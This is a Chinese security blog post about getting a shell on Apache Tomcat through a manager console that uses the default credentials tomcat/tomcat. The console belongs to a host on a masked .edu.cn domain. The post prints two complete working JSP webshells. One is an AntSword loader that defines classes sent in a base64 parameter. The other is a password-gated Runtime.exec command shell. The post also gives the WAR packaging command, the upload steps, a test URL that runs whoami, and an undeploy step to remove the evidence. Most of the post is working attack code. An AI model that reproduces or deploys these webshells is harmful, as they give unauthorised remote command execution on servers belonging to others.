Tomcat弱口令导致GetShell

012110

Tomcat弱口令导致GetShell

apache-tomcat_weak-pass&getshell

说明

内容

漏洞编号

漏洞名称

tomcat 弱口令

漏洞评级

高危

影响范围

漏洞描述

tomcat 管理控制台弱口令,导致攻击者可以登录,
并且可以部署Web 应用,甚至部署WebShell。

修复方案

重新配置管理控制台密码。

漏洞描述

tomcat 管理控制台弱口令,导致攻击者可以登录,并且可以部署Web 应用,甚至部署WebShell。

 

图片[1]-Tomcat弱口令导致GetShell-tess-wiki

http://www.xxx.edu.cn:8080/manager/html

账号:tomcat

密码:tomcat

图片[2]-Tomcat弱口令导致GetShell-tess-wiki登陆成功就进入这个服务器管理控制台了

图片[3]-Tomcat弱口令导致GetShell-tess-wiki

深度利用 GetShell

这个是给蚁剑连接的,密码cmd

shell.jsp

<%!
      class U extends ClassLoader {
		  U(ClassLoader c){
			  super(c);
		  }
		  public Class g(byte[] b){
			  return super.defineClass(b,0,b.length);
		  }
	  }
	 public byte[] base64Decode(String str) throws Exception{
		 try{
			 Class clazz =Class.forName("sun.misc.BASE64Decoder");
			 return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
		 }catch (Exception e){
			 Class clazz =Class.forName("java.util.Base64");
			 Object decoder =clazz.getMethod("getDecoder").invoke(null);
			 return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
		 }
	 }
%>
<% 
       String cls =request.getParameter("cmd");
       if(cls != null){
         new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 
 }
%>

这个是网页传参的,test.jsp?pwd=admin&cmd=whoami

test.jsp

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
 
 
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>
 
    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>
 
</html>

这次实验test.jsp生成war包

jar cvf test.war test.jsp

图片[4]-Tomcat弱口令导致GetShell-tess-wiki图片[5]-Tomcat弱口令导致GetShell-tess-wiki然后到网页上选择刚刚的文件,点击上传

图片[6]-Tomcat弱口令导致GetShell-tess-wiki

图片[7]-Tomcat弱口令导致GetShell-tess-wikiwww.xxx.edu.cn:8080/test/test.jsp?pwd=admin&cmd=whoami

图片[8]-Tomcat弱口令导致GetShell-tess-wiki收尾

ok,一切搞完,把war包删除

Undeploy

图片[9]-Tomcat弱口令导致GetShell-tess-wiki

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞复现
喜欢就支持一下吧
点赞10 分享
Tess的头像-tess-wiki
HTB靶机:Bastard-tess-wiki
HTB靶机:Bastard
HTB靶机:Bastard
2年前 291
使用Gost搭建一个快速简单的Socks5代理通道-tess-wiki
使用Gost搭建一个快速简单的Socks5代理通道
使用Gost搭建一个快速简单的Socks5代理通道
2年前 236
CISP-PTS-第一天-上午-tess-wiki
CISP-PTS-第一天-上午
CISP-PTS-第一天-上午
2年前 211
kali安装蚁剑AntSword和运行-tess-wiki
kali安装蚁剑AntSword和运行
kali安装蚁剑AntSword和运行
2年前 175
PWN入门-tess-wiki
PWN入门
PWN入门
2年前 153
Python 连接mysql脚本-tess-wiki
Python 连接mysql脚本
Python 连接mysql脚本
1年前 150
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)

    暂无评论内容